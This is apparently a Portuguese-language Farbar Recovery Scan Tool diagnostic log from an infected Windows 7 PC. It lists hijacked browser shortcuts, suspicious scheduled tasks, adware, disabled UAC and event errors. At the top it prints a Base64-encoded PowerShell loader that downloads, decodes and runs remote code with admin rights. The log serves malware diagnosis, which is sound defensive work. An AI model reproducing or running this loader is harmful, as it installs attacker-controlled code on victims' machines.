AFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {F2CB8D31-6B82-4FED-AD98-61246387AC1C} - \ToolsUpdatePlatform_ScheduledTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {F9D6E224-6F14-48C7-A9B5-767AFFEC6F71} - System32\Tasks\Advanced System~Protector_startup => C:\Program Files\ASP\AdvancedSystemProtector.exe [2015-11-20] () <==== ATENÇÃO
Task: {F9E3B046-66DF-4090-B732-1529CCA4B027} - \Winsta Update -> Nenhum Arquivo <==== ATENÇÃO
Task: {FD7038A1-5799-4640-A4F2-CCF297858221} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {FEC07962-18F6-451F-8F75-ED8CD3C24D60} - System32\Tasks\System HealerPeriod => C:\Program Files\SystemHealer\SystemHealer.exe [2015-12-29] ()
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\Windows\Tasks\A9C13285-6187-4191-BB56-1B491E1E1AE0.job => C:\Users\vivo\AppData\Local\A9C13285-6187-4191-BB56-1B491E1E1AE0\A9C13285-6187-4191-BB56-1B491E1E1AE0.exe <==== ATENÇÃO
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\dsmonitor.job => C:\Program Files\Uniblue\DriverScanner\dsmonitor.exe
Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files\SystemHealer\SystemHealer.exe
Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files\SystemHealer\SystemHealer.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
ShortcutWithArgument: C:\Users\vivo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox (2).lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
ShortcutWithArgument: C:\Users\vivo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeabests.cc/
==================== Módulos Carregados (Whitelisted) ==============
2015-12-30 15:08 - 2015-12-30 15:08 - 02771896 _____ () C:\ProgramData\System32\SafeGuard32.dll
2012-09-29 11:24 - 2012-09-29 13:24 - 00167936 _____ () C:\Windows\System32\HPM1210LM.DLL
2014-01-10 08:10 - 2012-12-04 20:33 - 00059904 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HP2030PP.DLL
2013-08-17 11:57 - 2012-09-29 13:24 - 00069632 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\HPM1210PP.dll
2016-01-17 17:32 - 2016-01-17 17:32 - 00157184 _____ () C:\ProgramData\Ancropafe\1.0.7.1\erwrolnu.exe
2016-01-17 14:09 - 2015-11-20 16:13 - 06513616 _____ () C:\Program Files\ASP\AdvancedSystemProtector.exe
2016-01-17 14:09 - 2015-03-17 10:59 - 00886272 _____ () C:\Program Files\ASP\System.Data.SQLite.dll
2016-01-17 14:09 - 2015-11-20 16:13 - 01730512 _____ () C:\Program Files\ASP\aspsys.dll
2016-01-17 14:09 - 2015-03-17 10:59 - 00168448 _____ () C:\Program Files\ASP\UNRAR.DLL
2015-12-29 10:24 - 2015-12-29 10:24 - 02484728 _____ () C:\Program Files\SystemHealer\SystemHealer.exe
2015-12-10 06:15 - 2015-12-10 06:15 - 00139912 _____ () C:\Program Files\CalendarTool\2.0.0.11153\CalendarEntry.dll
2016-01-16 21:22 - 2016-01-16 18:42 - 01905664 _____ () C:\ProgramData\WindowsMsg\osmsg.exe
2015-10-19 18:00 - 2015-10-19 18:00 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1046.dll
2009-10-15 12:13 - 2009-10-15 12:13 - 00061440 _____ () C:\Program Files\HP\HPLaserJetService\HPTools.dll
2009-10-15 12:13 - 2009-10-15 12:13 - 00964096 _____ () C:\Program Files\HP\HPLaserJetService\LEDMXMLObjects.dll
2013-08-17 11:49 - 2012-11-08 01:00 - 00081920 _____ () C:\Windows\system32\mvusbews.DLL
2016-01-13 03:16 - 2016-01-13 03:16 - 02314752 _____ () C:\Program Files\WajaNetEn\bde72a8dc6eba2c602b262b1c7a1da23.exe
2016-01-15 08:23 - 2015-12-08 10:24 - 07142328 _____ () C:\Users\vivo\AppData\Roaming\XBox\XBLive.exe
2016-01-15 08:23 - 2015-11-30 10:08 - 00256440 _____ () C:\Users\vivo\AppData\Roaming\XBox\Xbox.Live.dll
2014-11-03 10:15 - 2014-11-03 10:15 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\3d576cbc4ffc5ad06fd61510c5d8f326\IsdiInterop.ni.dll
2011-02-08 10:28 - 2010-03-03 20:08 - 00058880 _____ () C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2016-01-13 03:16 - 2016-01-13 03:16 - 02314752 _____ () c:\program files\wajaneten\bde72a8dc6eba2c602b262b1c7a1da23.exe
2016-01-19 08:12 - 2016-01-19 08:12 - 11752448 _____ () c:\program files\wajaneten\WajaNetEnlibs\hncxya.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00153224 _____ () C:\Program Files\CalendarTool\2.0.0.11153\CalendarServ.exe
2015-12-10 06:16 - 2015-12-10 06:16 - 00543368 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPTask.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00406664 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPNet.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00428680 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPDR.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00747144 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPKernel.dll
2015-12-10 06:16 - 2015-12-10 06:16 - 00327304 _____ () C:\Program Files\CalendarTool\2.0.0.11153\EVPHelp.dll
2015-12-10 06:15 - 2015-12-10 06:15 - 02259592 _____ () C:\Program Files\CalendarTool\2.0.0.11153\Calendar.exe
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
AlternateDataStreams: C:\Program Files\GbPlugin:IncompleteStartProcessProtection.cnt
AlternateDataStreams: C:\Windows\System32:22AD3627_Bb.gbp
AlternateDataStreams: C:\Windows\System32:22AD3627_Uni.gbp
AlternateDataStreams: C:\Windows\System32:4D9EB84B_Bb.gbp
AlternateDataStreams: C:\Windows\system32\drivers:GbpKmAp.lst
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Neilpe => ""="service"
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\bb.com.br -> hxxps://seg.bb.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\google.com -> www.google.com
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\google.com.br -> www.google.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itau.b.br -> www.itau.b.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itau.com.br -> bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itau.com.br -> hxxps://bankline.itau.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itaupersonnalite.com.br -> www.itaupersonnalite.com.br
IE trusted site: HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\itaupersonnalite.com.br -> hxxp://www.itaupersonnalite.com.br
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-14 00:04 - 2015-11-24 09:39 - 00000822 ____N C:\Windows\system32\Drivers\etc\hosts
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-2498198735-273976222-1782081069-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\vivo\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 189.39.152.35 - 189.39.152.45
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
MSCONFIG\startupreg: - => C:\ProgramData\msiql.exe /RUNNING
MSCONFIG\startupreg: AvastUI.exe => "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
MSCONFIG\startupreg: GfxServiceInstall => C:\Windows\system32\GfxCUIServiceInstall.vbs
MSCONFIG\startupreg: gmsd_br_004010210 => "C:\Program Files\gmsd_br_004010210\gmsd_br_004010210.exe"
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: HomePageHelper => C:\ProgramData\HomePage.exe
MSCONFIG\startupreg: IAStorIcon => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: LightGate => C:\ProgramData\LightGate.exe
MSCONFIG\startupreg: osmsg => C:\ProgramData\WindowsMsg\osmsg.exe /RUNNING
MSCONFIG\startupreg: PDFPrint => "C:\Program Files\PDF24\pdf24.exe"
MSCONFIG\startupreg: taskhost => rundll32.exe C:\ProgramData\WindowsMsg\E65602AFF61208B55B30B58739BDA171.dll Start /RUNNING
MSCONFIG\startupreg: unpkcs1132 => C:\Program Files\Common Files\unpkcs11buf\BRZPKCS32.exe -install
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{C30CE751-E94C-43EA-8465-B8AD72BD72B4}C:\program files\spyware terminator\spywareterminatorupdate.exe] => (Allow) C:\program files\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [UDP Query User{B0D6B68B-20BA-44CD-8EC7-817713486F13}C:\program files\spyware terminator\spywareterminatorupdate.exe] => (Allow) C:\program files\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [{7B8990A5-AC0B-4021-B703-2EA68FFA33EC}] => (Allow) C:\Program Files\mystarttb\ToolbarCleaner.exe
FirewallRules: [{25FCB9C0-EB6A-4134-904C-E21FA6109A26}] => (Allow) C:\Program Files\mystarttb\ToolbarCleaner.exe
FirewallRules: [TCP Query User{5378BD83-22D9-459B-8704-215436873EA9}C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe] => (Allow) C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe
FirewallRules: [UDP Query User{A74AF7FD-ACDE-4B0F-AC14-FAE1A4FDB585}C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe] => (Allow) C:\program files\corel\coreldraw graphics suite x7\programs\coreldrw.exe
==================== Pontos de Restauração =========================
ATENÇÃO: A Restauração do Sistema está desabilitada
==================== Dispositivos Apresentando Falhas No Gerenciador =============
Name: Teredo Tunneling Pseudo-Interface
Description: Adaptador de Túnel Teredo da Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: SafeNet Inc. USB Key
Description: SafeNet Inc. USB Key
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: SafeNet Inc.
Service: aksusb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (01/19/2016 08:24:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: CompatTelRunner.exe, versão: 10.0.11065.1000, carimbo de hora: 0x5646dba1
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x6f6d42c3
Identificação do processo com falha: 0xaa8
Hora de início do aplicativo com falha: 0xCompatTelRunner.exe0
Caminho do aplicativo com falha: CompatTelRunner.exe1
FCaminho do módulo de falhas: CompatTelRunner.exe2
Identificação do Relatório: CompatTelRunner.exe3
Error: (01/19/2016 08:24:05 AM) (Source: Customer Experience Improvement Program) (EventID: 1006) (User: )
Description: 80004005
Error: (01/18/2016 03:40:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: WerFault.exe, versão: 6.1.7600.16385, carimbo de hora: 0x4a5bc2d9
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x6f8942c3
Identificação do processo com falha: 0x350
Hora de início do aplicativo com falha: 0xWerFault.exe0
Caminho do aplicativo com falha: WerFault.exe1
FCaminho do módulo de falhas: WerFault.exe2
Identificação do Relatório: WerFault.exe3
Error: (01/18/2016 03:39:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: osmsg.exe, versão: 1.0.0.29, carimbo de hora: 0x569a1e94
Nome do módulo de falhas: osmsg.exe, versão: 1.0.0.29, carimbo de hora: 0x569a1e94
Código de exceção: 0xc0000005
Deslocamento com falha: 0x0000e9d2
Identificação do processo com falha: 0x172c
Hora de início do aplicativo com falha: 0xosmsg.exe0
Caminho do aplicativo com falha: osmsg.exe1
FCaminho do módulo de falhas: osmsg.exe2
Identificação do Relatório: osmsg.exe3
Error: (01/18/2016 03:29:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: SpywareTerminatorUpdate.exe, versão: 3.0.1.108, carimbo de hora: 0x565d533c
Nome do módulo de falhas: TorrentDll.dll, versão: 3.0.0.1, carimbo de hora: 0x4dbe5f67
Código de exceção: 0xc0000417
Deslocamento com falha: 0x00132780
Identificação do processo com falha: 0x760
Hora de início do aplicativo com falha: 0xSpywareTerminatorUpdate.exe0
Caminho do aplicativo com falha: SpywareTerminatorUpdate.exe1
FCaminho do módulo de falhas: SpywareTerminatorUpdate.exe2
Identificação do Relatório: SpywareTerminatorUpdate.exe3
Error: (01/18/2016 09:03:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: winlogon.exe, versão: 6.1.7601.18540, carimbo de hora: 0x53c71d03
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.19110, carimbo de hora: 0x5684255a
Código de exceção: 0xc0000005
Deslocamento com falha: 0x00065689
Identificação do processo com falha: 0x270
Hora de início do aplicativo com falha: 0xwinlogon.exe0
Caminho do aplicativo com falha: winlogon.exe1
FCaminho do módulo de falhas: winlogon.exe2
Identificação do Relatório: winlogon.exe3
Error: (01/18/2016 08:40:32 AM) (Source: Customer Experience Improvement Program) (EventID: 1006) (User: )
Description: 80004005
Error: (01/18/2016 08:38:47 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: CompatTelRunner.exe, versão: 10.0.11065.1000, carimbo de hora: 0x5646dba1
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x6fd542c3
Identificação do processo com falha: 0x8a0
Hora de início do aplicativo com falha: 0xCompatTelRunner.exe0
Caminho do aplicativo com falha: CompatTelRunner.exe1
FCaminho do módulo de falhas: CompatTelRunner.exe2
Identificação do Relatório: CompatTelRunner.exe3
Error: (01/17/2016 09:09:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: SpywareTerminatorUpdate.exe, versão: 3.0.1.108, carimbo de hora: 0x565d533c
Nome do módulo de falhas: TorrentDll.dll, versão: 3.0.0.1, carimbo de hora: 0x4dbe5f67
Código de exceção: 0xc0000417
Deslocamento com falha: 0x00132780
Identificação do processo com falha: 0x101c
Hora de início do aplicativo com falha: 0xSpywareTerminatorUpdate.exe0
Caminho do aplicativo com falha: SpywareTerminatorUpdate.exe1
FCaminho do módulo de falhas: SpywareTerminatorUpdate.exe2
Identificação do Relatório: SpywareTerminatorUpdate.exe3
Error: (01/17/2016 05:36:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: myoffergroup_br4.tmp, versão: 51.52.0.0, carimbo de hora: 0x2a425e19
Nome do módulo de falhas: SafeGuard32.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x568382a8
Código de exceção: 0xc0000005
Deslocamento com falha: 0x705842c3
Identificação do processo com falha: 0xc34
Hora de início do aplicativo com falha: 0xmyoffergroup_br4.tmp0
Caminho do aplicativo com falha: myoffergroup_br4.tmp1
FCaminho do módulo de falhas: myoffergroup_br4.tmp2
Identificação do Relatório: myoffergroup_br4.tmp3
Erros de Sistema:
=============
Error: (01/19/2016 08:15:05 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço MPC Core Protect Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (01/19/2016 08:12:57 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
UGProtect
Error: (01/19/2016 08:12:44 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Windows Security devido ao seguinte erro:
%%2
Error: (01/19/2016 08:12:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço HASP License Manager devido ao seguinte erro:
%%1053
Error: (01/19/2016 08:12:37 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço HASP License Manager.
Error: (01/19/2016 08:12:04 AM) (Source: SCardSvr) (EventID: 602) (User: )
Description: O sistema não pode encontrar o caminho especificado.
Error: (01/19/2016 08:12:04 AM) (Source: SCardSvr) (EventID: 602) (User: )
Description: O sistema não pode encontrar o caminho especificado.
Error: (01/19/2016 08:12:04 AM) (Source: SCardSvr) (EventID: 602) (User: )
Description: O sistema não pode encontrar o caminho especificado.
Error: (01/19/2016 08:12:02 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço Arquivos Offline terminou com o erro:
%%3
Error: (01/19/2016 08:11:59 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: O desligamento anterior do sistema em 18:02:08 às 18/01/2016 não era esperado.
CodeIntegrity:
===================================
Date: 2015-10-29 23:00:22.974
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2015-10-29 23:00:21.669
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2015-10-29 23:00:19.697
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Informações da Memória ===========================
Processador: Intel(R) Atom(TM) CPU N2600 @ 1.60GHz
Percentagem de memória em uso: 82%
RAM física total: 2008.86 MB
RAM física disponível: 347.25 MB
Virtual Total: 4016.86 MB
Virtual disponível: 1190.3 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:298.09 GB) (Free:60.51 GB) NTFS ==>[drive com componentes de inicialização (obtido através de BCD)]
Drive d: (XP2012) (CDROM) (Total:0.52 GB) (Free:0 GB) CDFS
Drive f: () (Removable) (Total:7.44 GB) (Free:7.42 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== Fim de Addition.txt ============================
Executado por vivo (2016-01-19 13:04:22)
Executando a partir de C:\Users\vivo\Downloads
Microsoft Windows 7 Professional Service Pack 1 (X86) (2013-07-30 17:00:57)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-2498198735-273976222-1782081069-500 - Administrator - Disabled)
Convidado (S-1-5-21-2498198735-273976222-1782081069-501 - Limited - Enabled)
vivo (S-1-5-21-2498198735-273976222-1782081069-1001 - Administrator - Enabled) => C:\Users\vivo
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: avast! Antivirus (Enabled - Out of date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Out of date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
Adobe Flash Player 20 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Reader X (10.1.0) - Português (HKLM\...\{AC76BA86-7AD7-1046-7B44-AA1000000001}) (Version: 10.1.0 - Adobe Systems Incorporated)
Advanced Calendar 2.0.0.11153 (HKLM\...\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}) (Version: 2.0.0.11153 - MEIXIAN XIE) <==== ATENÇÃO
Advanced-System Protector (HKLM\...\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~9338DF9D_is1) (Version: 2.2.1000.19019 - Advanced System Protector) <==== ATENÇÃO
Atualização do produto Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0416-0000-0000000FF1CE}_ENTERPRISE_{717C9095-8AAE-41CB-B046-BD6E8399F4F3}) (Version: - Microsoft)
Atualização do produto Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0416-0000-0000000FF1CE}_ENTERPRISE_{5016CB22-B9A7-44FB-AA72-AF28B27B15EA}) (Version: - Microsoft)
Atualização do produto Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0416-0000-0000000FF1CE}_ENTERPRISE_{BE3A7C0C-0081-4694-B5F9-980DD66BDDF8}) (Version: - Microsoft)
Atualização do produto Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0416-0000-0000000FF1CE}_ENTERPRISE_{7297E3A9-FCD4-4E0E-A306-7A90359E50E3}) (Version: - Microsoft)
aTube Catcher versão 3.8 (HKLM\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Avast Free Antivirus (HKLM\...\avast) (Version: 10.3.2218 - AVAST Software)
CCleaner (HKLM\...\CCleaner) (Version: 5.11 - Piriform)
